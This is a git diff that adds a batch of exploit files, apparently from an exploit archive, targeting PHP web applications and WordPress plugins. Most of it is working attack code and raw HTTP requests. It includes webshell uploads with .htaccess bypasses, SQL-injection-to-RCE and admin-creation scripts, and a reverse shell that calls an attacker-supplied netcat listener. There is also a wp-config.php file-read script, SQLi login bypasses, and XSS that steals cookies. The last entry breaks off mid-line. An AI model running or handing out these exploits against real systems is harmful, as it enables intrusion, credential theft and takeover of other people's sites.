RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) +# Date: 25/07/2021 +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://ritecms.com/ +# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip +# Version: <= 3.1.0 +# Tested on: Windows 10, Ubuntu 18, XAMPP +# Google Dork: intext:"Powered by RiteCMS" +# Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597 + + +""" +################ +# Description # +################ + +# RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default. +# There are 4 ways of bypassing the current file upload protection to achieve remote code execution. + +# Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved + +# Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved + +# Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved +By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability. +Intercept the request, modify file_name param and place this payload "../webrootExec.php" to upload the php file to web root + +body= Content-Disposition: form-data; name="file_name" +body= ../webrootExec.php + +So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php + +# Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" then upload PHP webshell.php - RCE achieved + +$ cat .htaccess + + +deny from all + + + + Allow from all + + + +################################### +# PoC for webshell using Method 2 # +################################### + +Steps to Reproduce: + +1. Login as admin +2. Go to Files Manager +3. Choose a directory to upload .php file either media or files directory. +4. Then, click Upload file > Browse.. +3. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess +4. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory + +Request: +======== + +POST /ritecms.v3.1.0/admin.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309 +Content-Length: 1744 +Origin: http://localhost +DNT: 1 +Connection: close +Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media +Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Sec-GPC: 1 + +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="mode" + +filemanager +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="file"; filename="webshell.pHp" +Content-Type: application/octet-stream + + +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="directory" + +media +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="file_name" + +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="upload_mode" + +1 +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="resize_xy" + +x +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="resize" + +640 +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="compression" + +80 +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="thumbnail_resize_xy" + +x +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="thumbnail_resize" + +150 +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="thumbnail_compression" + +70 +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="upload_file_submit" + +OK - Upload file +-----------------------------410923806710384479662671954309-- + + +#################### +# Webshell access: # +#################### + +# Webshell access via: +PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id + +# Output: +uid=33(www-data) gid=33(www-data) groups=33(www-data) + +""" \ No newline at end of file diff --git a/exploits/php/webapps/50617.txt b/exploits/php/webapps/50617.txt new file mode 100644 index 000000000..a4009f449 --- /dev/null +++ b/exploits/php/webapps/50617.txt @@ -0,0 +1,84 @@ +# Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) +# Date: 22/12/2021 +# Exploit Author: gx1 +# Vulnerability Discovery: Gaetano Perrone +# Vendor Homepage: https://www.crmperks.com/ +# Software Link: https://wordpress.org/plugins/contact-form-entries/ +# Version: < 1.1.7 +# Tested on: any + +# References: + +* https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac +* https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/ + +# Description: +Contact Form Entries < 1.1.7 is vulnerable to Unauthenticated Stored Cross-Site Scripting + +# Technical Details and Exploitation: + +CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field. +When the user uploads a new form, CRM Form Entries checks for the client IP in order to save information about the user: +=============================================================================================================== +public function get_ip(), wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388 +============================================================================================================== +The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is stored inside the database. + + +# Proof Of Concept: + +Suppose that you have a Contact Form, intercept the POST request and insert the following Client-IP header +=============================================================================================================== +POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1 +Host: dsp.com:11080 +Content-Length: 1411 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ... +Client-IP: + +------WebKitFormBoundaryCuNGXLnhRsdglEAx + +Content-Disposition: form-data; name="_wpcf7" + +10 +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_version" + +5.3.1 +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_locale" + +en_US +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_unit_tag" + +wpcf7-f10-p13-o1 +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_container_post" + +Content-Disposition: form-data; name="_wpcf7" + +10 +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_version" + +5.3.1 +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_locale" + +en_US +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_unit_tag" + +wpcf7-f10-p13-o1 +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_container_post" +... +=============================================================================================================== +The request is acccepted, and the code navigates the section $_SERVER['HTTP_CLIENT_IP'] , ip is injected and saved inside the database. +When the administrator clicks on the entry element in the plugin, the XSS is triggered. + + +# Solution: +Upgrade Contact Form Entries to version 1.1.7 \ No newline at end of file diff --git a/exploits/php/webapps/50619.py b/exploits/php/webapps/50619.py new file mode 100755 index 000000000..e614ebe9c --- /dev/null +++ b/exploits/php/webapps/50619.py @@ -0,0 +1,86 @@ +# Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection +# Date 22/12/2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://www.plugins-market.com/ +# Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip +# Version: <= 4.7 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2021-24750 +# CWE: CWE-89 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md + +''' +Description: +The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action, +available to any authenticated user, which could allow users with a role as low as +subscriber to perform SQL injection attacks +''' + +# Banner: +banner = ''' + ___ _ _ ____ ___ ___ ___ __ ___ __ ___ ___ ___ + / __)( \/ )( ___)___(__ \ / _ \(__ \ / )___(__ \ /. |(__ )| __) / _ \ +( (__ \ / )__)(___)/ _/( (_) )/ _/ )((___)/ _/(_ _)/ / |__ \( (_) ) + \___) \/ (____) (____)\___/(____)(__) (____) (_)(_/ (___/ \___/ + + [+] WP Visitor Statistics SQL Injection + [@] Developed by Ron Jost (Hacker5preme) + +''' +print(banner) + +import argparse +import requests +from datetime import datetime + +# User-Input: +my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +my_parser.add_argument('-u', '--USERNAME', type=str) +my_parser.add_argument('-p', '--PASSWORD', type=str) +my_parser.add_argument('-C', '--COMMAND', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +wp_path = args.PATH +username = args.USERNAME +password = args.PASSWORD +command = args.COMMAND + +print('') +print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) +print('') + +# Authentication: +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' +check = session.get(auth_url) +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Body: +body = { + 'log': username, + 'pwd': password, + 'wp-submit': 'Log In', + 'testcookie': '1' +} +auth = session.post(auth_url, headers=header, data=body) + +# Exploit: +exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}' +exploit = session.get(exploit_url) +print(exploit.text) +print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S'))) \ No newline at end of file diff --git a/exploits/php/webapps/50621.py b/exploits/php/webapps/50621.py new file mode 100755 index 000000000..f760a1c9f --- /dev/null +++ b/exploits/php/webapps/50621.py @@ -0,0 +1,56 @@ +# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) +# Date: 22/12/2021 +# Exploit Author: Tagoletta (Tağmaç) +# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html +# Version: 1.0 +# Tested on: Windows + +import requests +import json + +url = input('Url:') +if not url.startswith('http://') and not url.startswith('https://'): + url = "http://" + url +if not url.endswith('/'): + url = url + "/" + +Username = "tago" +Password = "tagoletta" + +reqUrl = url + "classes/Users.php?f=save" + +reqHeaders = { + "Accept": "*/*", + "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac", + "X-Requested-With": "XMLHttpRequest", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", + "Origin": url} + +reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n" + +resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) + +if resp.status_code == 200: + print("Admin account created") + reqUrl = url + "classes/Login.php?f=login" + + reqHeaders = { + "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", + "X-Requested-With": "XMLHttpRequest", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", + "Origin": url + } + + reqData = {"username": ""+Username+"", "password": ""+Password+""} + + resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) + + data = json.loads(resp.text) + status = data["status"] + + if status == "success": + print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password) + else: + print("Exploited but not loginned") +else: + print("Not injectable") \ No newline at end of file diff --git a/exploits/php/webapps/50622.py b/exploits/php/webapps/50622.py new file mode 100755 index 000000000..50dae66fa --- /dev/null +++ b/exploits/php/webapps/50622.py @@ -0,0 +1,71 @@ +# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated) +# Date: 22/12/2021 +# Exploit Author: Tagoletta (Tağmaç) +# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html +# Version: 1.0 +# Tested on: Ubuntu +# This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads. + +import requests +import random +import string +from bs4 import BeautifulSoup + +url = input("TARGET = ") + +if not url.startswith('http://') and not url.startswith('https://'): + url = "http://" + url +if not url.endswith('/'): + url = url + "/" + +payload = "" + +let = string.ascii_lowercase +shellname = ''.join(random.choice(let) for i in range(15)) + +resp = requests.get(url) +htmlParser = BeautifulSoup(resp.text, 'html.parser') + +getMenu = htmlParser.findAll("a", {"class": "nav-link"}) +selectPage = "" +for i in getMenu: + if "movie" in i.text.lower(): + selectPage = i["href"] + break + +selectPage = selectPage.replace("./","") +findSql = url + selectPage +resp = requests.get(findSql) +htmlParser = BeautifulSoup(resp.text, 'html.parser') +movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"}) + +sqlPage = movieList[0]["href"] +sqlPage = sqlPage.replace("./","") + +sqlPage = url + sqlPage + +print("\nFinding path") + +findPath = requests.get(sqlPage + '\'') +findPath = findPath.text[findPath.text.index("Warning: ")+17:findPath.text.index(" on line ")] +findPath = findPath[findPath.index("")+3:len(findPath)] +print("injection page: "+sqlPage) + +parser = findPath.split('\\') +parser.pop() +findPath = "" +for find in parser: + findPath += find + "/" + +print("\nFound Path : " + findPath) + +SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -" +SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php") +SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex()) + +print("\n\nShell Uploading...") +status = requests.get(sqlPage+SQLtoRCE) + +shellOutput = requests.get(url+shellname+".php?tago=whoami") +print("\n\nShell Output : "+shellOutput.text) +print("\nShell Path : " + url+shellname+".php") \ No newline at end of file diff --git a/exploits/php/webapps/50623.py b/exploits/php/webapps/50623.py new file mode 100755 index 000000000..920b493af --- /dev/null +++ b/exploits/php/webapps/50623.py @@ -0,0 +1,88 @@ +# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 23/12/2021 +# Exploit Author: Jeremiasz Pluta +# Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System +# Software Link: https://github.com/rskoolrash/Online-Admission-System +# Tested on: LAMP Stack (Debian 10) + +#!/usr/bin/python +import sys +import re +import argparse +import requests +import time +import subprocess + +print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)') + +path = '/' #change me if the path to the /oas is in the root directory or another subdir + +class Exploit: + + def __init__(self, target_ip, target_port, localhost, localport): + self.target_ip = target_ip + self.target_port = target_port + self.localhost = localhost + self.localport = localport + + def exploitation(self): + payload = """""" + payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" + + url = 'http://' + target_ip + ':' + target_port + path + r = requests.Session() + + print('[*] Resolving URL...') + r1 = r.get(url + 'documents.php') + time.sleep(3) + + #Upload the payload file + print('[*] Uploading the webshell payload...') + files = { + 'fpic': ('cmd.php', payload + '\n', 'application/x-php'), + 'ftndoc': ('', '', 'application/octet-stream'), + 'ftcdoc': ('', '', 'application/octet-stream'), + 'fdmdoc': ('', '', 'application/octet-stream'), + 'ftcdoc': ('', '', 'application/octet-stream'), + 'fdcdoc': ('', '', 'application/octet-stream'), + 'fide': ('', '', 'application/octet-stream'), + 'fsig': ('', '', 'application/octet-stream'), + } + data = {'fpicup':'Submit Query'} + r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data) + time.sleep(3) + + print('[*] Setting up netcat listener...') + listener = subprocess.Popen(["nc", "-nvlp", self.localport]) + time.sleep(3) + + print('[*] Spawning reverse shell...') + print('[*] Watchout!') + r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2) + time.sleep(3) + + if (r3.status_code == 200): + print('[*] Got shell!') + while True: + listener.wait() + else: + print('[-] Something went wrong!') + listener.terminate() + +def get_args(): + parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)') + parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') + parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') + parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') + parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') + args = parser.parse_args() + return args + +args = get_args() +target_ip = args.url +target_port = args.target_port +localhost = args.localhost +localport = args.localport + +exp = Exploit(target_ip, target_port, localhost, localport) +exp.exploitation() \ No newline at end of file diff --git a/exploits/php/webapps/50624.py b/exploits/php/webapps/50624.py new file mode 100755 index 000000000..cd477114a --- /dev/null +++ b/exploits/php/webapps/50624.py @@ -0,0 +1,39 @@ +# Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) +# Date: 23/12/2021 +# Exploit Authors: Nicole Sheinin, Liad Levy +# Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/ +# Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/ +# Version: versions <= 2.2.2 +# Tested on: MacOS +# CVE: CVE-2021-39312 +# Github repo: + +#!/usr/bin/env python3 + +import argparse, textwrap +import requests +import sys + +parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter) +group_must = parser.add_argument_group('must arguments') +group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True) +parser.add_argument("-p","--payload", help="Path to read [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False) + +args = parser.parse_args() + +if len(sys.argv) <= 2: + print (f"Exploit Usage: ./exploit.py -h [help] -u [url]") + sys.exit() + +HOST = args.url +PAYLOAD = args.payload + +url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST) +payload = "/scripts/simple.php/{}".format(PAYLOAD) + + +r = requests.post(url,data={'src': payload}) +if r.status_code == 200: + print(r.text) +else: + print("No exploit found") \ No newline at end of file diff --git a/exploits/php/webapps/50625.txt b/exploits/php/webapps/50625.txt new file mode 100644 index 000000000..2cb1ffeaa --- /dev/null +++ b/exploits/php/webapps/50625.txt @@ -0,0 +1,20 @@ +# Exploit Title: Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS) +# Google Dork: NA +# Date: 03-OCT-2021 +# Exploit Author: Akash Rajendra Patil +# Vendor Homepage: https://www.yahoobaba.net/project/library-system-in-php +# Software Link: https://www.yahoobaba.net/project/library-system-in-php +# Version: V 1.0 +# Tested on: WAMPP +# Description # + +Library System in PHP V1.0 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitisation. + +# Proof of Concept (PoC) : +#Exploit: +1) Goto: http://localhost/library-system/dashboard.php +2) Login as admin using test credentials: admin/admin +3) Goto: http://localhost/library-system/update-publisher.php?pid=12 +4) Enter the following payload in the publisher field: +5) Click on Save +6) Our payload is fired and stored \ No newline at end of file diff --git a/exploits/php/webapps/50626.txt b/exploits/php/webapps/50626.txt new file mode 100644 index 000000000..080a6653c --- /dev/null +++ b/exploits/php/webapps/50626.txt @@ -0,0 +1,19 @@ +# Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS) +# Date: 28/12/2021 +# Exploit Author: Momen Eldawakhly - Cyber Guy - (Resecurity Inc) +# Vendor Homepage: https://www.safarimontage.com/ +# Version: 8.3 and 8.5 +# Tested on: Ubuntu Linux [Firefox] +# CVE: CVE-2021-45425 + +# Proof of Concept: + +GET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1 +Host: vulnIP +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=SSSION; lang=en +Connection: close \ No newline at end of file diff --git a/exploits/php/webapps/50627.txt b/exploits/php/webapps/50627.txt new file mode 100644 index 000000000..f4e314c06 --- /dev/null +++ b/exploits/php/webapps/50627.txt @@ -0,0 +1,31 @@ +# Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass +# Date: 23/12/2021 +# Exploit Author: Momen Eldawakhly (Cyber Guy) +# Vendor Homepage: https://wiki.nettemp.tk +# Software Link: https://wiki.nettemp.tk +# Version: nettmp NNT +# Tested on: Linux (Ubuntu 20.04) + +Payload: + +username: 1' or 1=1;-- +password: \ + +Proof of Concept: + +POST /index.php?id=status HTTP/1.1 +Host: vuln.com +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 55 +Origin: http://vuln.com +DNT: 1 +Connection: close +Referer: http://vulnIP/index.php?id=status +Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq +Upgrade-Insecure-Requests: 1 + +username=1%27+or+1%3D1%3B--&password=%5C&form_login=log \ No newline at end of file diff --git a/exploits/php/webapps/50628.txt b/exploits/php/webapps/50628.txt new file mode 100644 index 000000000..05ba0256a --- /dev/null +++ b/exploits/php/webapps/50628.txt @@ -0,0 +1,15 @@ +# Exploit Title: Hostel Management System 2.1 - Cross Site Scripting (XSS) +# Date: 26/12/2021 +# Exploit Author: Chinmay Vishwas Divekar +# Vendor Homepage: https://phpgurukul.com/hostel-management-system/ +# Software Link: https://phpgurukul.com/hostel-management-system/ +# Version: V 2.1 +# Tested on: PopOS_20.10 + +*Steps to reproduce* + +1) Open book-hostel page using following url https://localhost/hostel/book-hostel.php +2) Enter xss payload on various input fields. +3) Server Accepted our Payload in input fileds. + +Affected input fields: Correspondence Address, Guardian Relation, Permanent Address \ No newline at end of file diff --git a/exploits/php/webapps/50630.txt b/exploits/php/webapps/50630.txt new file mode 100644 index 000000000..f06e10b39 --- /dev/null +++ b/exploits/php/webapps/50630.txt @@ -0,0 +1,22 @@ +# Exploit Title: Hospitalss Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated) +# Date: 30/12/2021 +# Exploit Author: twseptian +# Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip +# Version: v1.0 +# Tested on: Kali Linux 2021.4 + +*SQL Injection* +SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Hospital's Patient Records Management System v1.0 is vulnerable to SQL injection via the 'id' parameter on the patient list. + +*Attack Vector* +An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap. + +*Steps to reproduce:* +Step-1: On the dashboard navigate to 'Patient List', then go to 'Action' > 'View Records' page using the following URL: +http://localhost/hprms/admin/?page=patients/view_patient&id=1 + +Step-2: Put the SQL Injection payloads in 'id' field. +time-based blind payload : page=patients/view_patient&id=1' AND (SELECT 2664 FROM (SELECT(SLEEP(5)))ixec) AND 'XcAY'='XcAY + +Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds. \ No newline at end of file diff --git a/exploits/php/webapps/50631.txt b/exploits/php/webapps/50631.txt new file mode 100644 index 000000000..66adcbce9 --- /dev/null +++ b/exploits/php/webapps/50631.txt @@ -0,0 +1,122 @@ +# Exploit Title: Hospitals Patient Records Management System 1.0 - Account TakeOver +# Date: 30/12/2021 +# Exploit Author: twseptian +# Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip +# Version: v1.0 +# Tested on: Kali Linux 2021.4 + +*Insecure direct object references (IDOR)* +Insecure Direct Object References (IDOR) occur when an application provides direct access to objects based on user-supplied input.Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system. + +*Attack Vector* +An attacker can takeover the Administrator's account + +*Steps of reproduce:* +Note: in this case, we used two users, user1 as a staff with user id '4', and admin as an Administrator with user id '1'. + +===================================================================================================================================== + +Step-1: Log in to the application using user1 account,then on the dashboard navigate to 'My Account' + +http://localhost/hprms/admin/?page=user + +===================================================================================================================================== + +Step-2: Modify the username,lastname and password,then let's intercept the request using burpsuite: + +POST /hprms/classes/Users.php?f=save HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239 +Content-Length: 806 +Origin: http://localhost +Connection: close +Referer: http://localhost/hprms/admin/?page=user +Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="id" + +4 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="firstname" + +user1 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="lastname" + +admin +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="username" + +admin1 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="password" + +admin1 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="img"; filename="" +Content-Type: application/octet-stream + + +-----------------------------17632878732301879013646251239-- + +===================================================================================================================================== + +Step-3: Change parameter id '4' to id '1' + +POST /hprms/classes/Users.php?f=save HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239 +Content-Length: 806 +Origin: http://localhost +Connection: close +Referer: http://localhost/hprms/admin/?page=user +Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="id" + +1 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="firstname" + +user1 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="lastname" + +admin +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="username" + +admin1 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="password" + +admin1 +-----------------------------17632878732301879013646251239 +Content-Disposition: form-data; name="img"; filename="" +Content-Type: application/octet-stream + + +-----------------------------17632878732301879013646251239-- + +===================================================================================================================================== + +step-4: Click 'Forward' on burpsuite. Now user1 is a Administrator. \ No newline at end of file diff --git a/exploits/php/webapps/50634.txt b/exploits/php/webapps/50634.txt new file mode 100644 index 000000000..e0b076ad3 --- /dev/null +++ b/exploits/php/webapps/50634.txt @@ -0,0 +1,35 @@ +# Exploit Title: Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection +# Google Dork: Powered by Virtual Airlines Manager [v2.6.2] +# Date: 2021-12-30 +# Exploit Author: Milad Karimi +# Vendor Homepage: http://virtualairlinesmanager.net +# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/ +# Version: 2.6.2 +# Tested on: Ubuntu 19.04 + +[1] Vulnerable GET parameter: notam_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=notam¬am_id=[SQLi] + +[2] Vulnerable GET parameter: 